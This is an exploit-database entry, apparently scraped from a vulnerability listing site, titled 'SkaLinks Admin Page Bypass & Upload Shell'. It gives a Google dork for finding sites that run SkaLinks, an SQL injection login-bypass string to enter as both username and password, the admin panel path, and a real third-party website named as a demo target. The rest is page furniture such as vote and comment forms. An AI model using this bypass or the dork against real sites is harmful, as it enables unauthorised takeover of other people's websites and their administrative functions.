SkaLinks Admin Page Bypass & Upload Shell

2016.08.06

MrHoudini (IR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Powered by SkaLinks"

# Exploit Title : SkaLinks Admin Page Bypass & Upload Shell
# Google Dork : intext:"Powered by SkaLinks"
# Discovered by : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# My WebSite : http://www.MrHoudini.ir
# Date : 6-8-2016
# Vendor HomePage : http://www.skalinks.com/


Exploit : 

Username : '=' 'or'
Password : '=' 'or'

Admin Panel : Site.com/[PATH]/admin/

Demo : 

http://www.licytus.pl/admin/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SkaLinks Admin Page Bypass & Upload Shell

Dork: intext:"Powered by SkaLinks"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.